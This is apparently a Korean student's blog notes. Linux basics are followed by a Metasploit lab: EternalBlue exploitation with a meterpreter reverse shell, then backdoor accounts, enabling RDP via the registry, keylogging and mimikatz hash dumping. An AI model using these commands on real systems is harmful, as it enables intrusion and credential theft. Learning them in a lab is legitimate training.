@해시 함수 : 해시함수는 암호화 함수가 아니다
같은 키값에 대해 항상 같은 출력값을 내는 것이다.
md5 , sha256 - 무결성 보장
@터널창
root@jjy:~# 사용자 이름 , , 위치 , 권한
# : 관리자 , $ : 사용자
한/영 전환 : ctrl + shift + space
복사 : alt + insert
붙혀넣기 : shift + insert
@리눅스 계열
1. Debian - Debian , Ubuntu
(kali는 debian 계열)
인터넷 소프트웨어 설치 명령어 : apt (설정파일 위치 다름)
2. Slackware - Slacware , Suse Linux
인터넷 소프트웨어 설치 명령어 : ziper
3. Redhat - Redhat , Centos , Fedora
인터넷 소프트웨어 설치 명령어 : yum
@리눅스 버전 - Kernel.org
XX . XX . XX
메이저 마이너 릴리즈
클라우드 아키텍쳐 기반 - x86 (CPU : intel계열)
=> 마이크로세서가 달라지면 명령어 체계가 달라지므로 다른 계열을 지원하지 않는다
@kali 한글
1. apt-get install -y nunum nabi im-switch
2. im-config -s nabi
3. im-config -c
hagule 에서 space 후 enter
@@apt 안먹을 때 : vi /etc/apt/sources.list
deb http://http.kali.org/kali kali-rolling main non-free contrib
*tar명령어 : tar는 여러 파일을 하나로 합치는 명령어이다
옵션 =
-c : 새로운 파일 생성하며 합침
-x : 다시 여러개로 푸는 명령
*시스템 종료 명령어 :
init 6 - 재부팅
@터미널 영어 깨질때 : LANG=C
@리눅스 VI
*입력 : a : 글자 바로 앞에
A : 문장 맨앞으로
i : 글자 바로 뒤에
I : 문장 맨뒤에
o : 밑줄
O : 윗줄
*저장 : (:)콜록 입력후 wq
또는 ZZ
@Vmware 주변 프로그램 설치 => 클립보드 동기화(copy) , 화면 크기 맞춰짐
1. Vmware Tap -> VM -> install VmWareTools
2. cd /media/cdrom/
3. mkdir /vm <= 마운트포인트 디렉토리 생성
4. cp VMwareTools-10.1.15-6627299.tar.gz /vm <= 설치할 프로그램 복사
5. tar xvfz VmwareTools-10.1.15-6627299.tar.gz <= 압축 풀기
6. ./vmware-insall.pl <= 설치프로그램 실행
7. reboot
8. enter 연타
@터미널 단축키
1. 전원버튼
2. 환경설정
3. 장치
4. 키보드
5. 제일 하단 +(추가)
6. 이름 : Terminal
명령어 : gnome-terminal
단축키 : 맘대로
@Db 실행 => service postgresql start
msfdb init (kali 설치후 딱한번만 하면됨)
#용어
Exploit : 취약점
payload :
CVE : 취약점 표준 코드
이터널 블루 : 보안 취약점 공격 도구
@모의 해킹
*순서
1. 정보수집
2. 취약점 분석
3. 웹엡 분석
4. 데이터베이스 평가
5. 비밀번호 공격
6. 무선 공격
7. 역공학
8. ...
*Metasploit(메타스플로잇)
- 공격도구 , 페이로더 , 인코더 , 정찰도구 , 보안 테스팅을 제공하는 취약점 진단 및 공격 툴
*실습
0. service postgresql start : Postgres DB에 메타스플로잇을 연결하면 사용한 공격 모듈 정보가 남아 있어 다음에 또 사용시 빠르다
msfdb init : 디비 초기화
msfconsole : 메타스플로잇 실행
1. search eternalblue : 취약점 찾기
*서치속도 느릴때 : db rebuild cache
2. use exploit/windows/smb/ms17_010_eternalblue
3. show options : 옵션들 보기
RHOST : 타겟 IP
4. set RHOST 1.0.0.1 : 공격 타겟
set payload windows/x64/meterpreter/reverse_tcp : 공격 행위 결정 (set payload tap 두번 하면 사용가능한 payload가 보임)
set LHOST 1.0.0.12 : 시도하는 자
run : 공격 시도 => 상대 컴퓨터에 접속됨
(windows 7 은 135,139,445 포트를 열어야 한다)
ps : 상대 컴퓨
=> 상대 컴퓨터에 접속 완료 ( meterpreter > 가 뜨면 완료됨)
? : 사용가능한 명령어 보임
1. screenshot : 상대 컴퓨터의 화면이 캡쳐됨 ( 위치 -> 홈 )
2. shell : 상대 컴퓨터의 shell이 실행됨
=>
*User다루기
net user administrator /Active:yes : 해킹한 PC의 administrator 계정 활성화
net user 사용자 비밀번호 : 해킹한 PC의 administrator 비밀번호 지정
net user 이름 /add : 사용자 계정 생성
*Group다루기
net localgroup 그룹이름 /add : 그룹추가
net localgroup 그룹이름 사용자이름 /add : 그룹에 사용자 추가
(*migrate explorer 를 한후에는 사용자 계정의 권한을 얻어오는 것이므로 migrate를 하지 않고
해야함)
(* shell 명령어 깨질때 : chcp 65001)
3. 원격데스크톱
1. shell에서 administrator 권한 얻고나서
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f : 원격데스크톱 허용
2. rdesktop -u user -p password ip : 원격 데스크톱 요청
*실습2 (key loggin)
explorer - 사용자 작업 환경
=> 사용자가 사용하는 모든 프로그램은 explorer 자식 프로세스로 생성된다
*키로깅을 위해서는 explorer 권한을 가져와야 한다
1. ps 를 통해 실행중인 프로세스를 확인 하여 exploerer의 pid를 찾는다
2. migrate explorerPID
3. keyscan start
4. keyscan_dump
(migrate가 안되는경우 window7 재부팅)
*mimikatz
load mimikatz
mimikatz_command -f hash::ntlm
crackstation.net 에서 lm 비밀번호 값을
'Cloud 교육' 카테고리의 다른 글
Vmware Nat service 오류시 (0) | 2018.09.11 |
---|---|
Server 개념 (0) | 2018.09.11 |
5일차 (시스코 패킷트레이서 멀티유저 설정) (0) | 2018.09.07 |
라우터 구조 (0) | 2018.09.07 |
시스코 패킷 트레이서 라우팅 (0) | 2018.09.07 |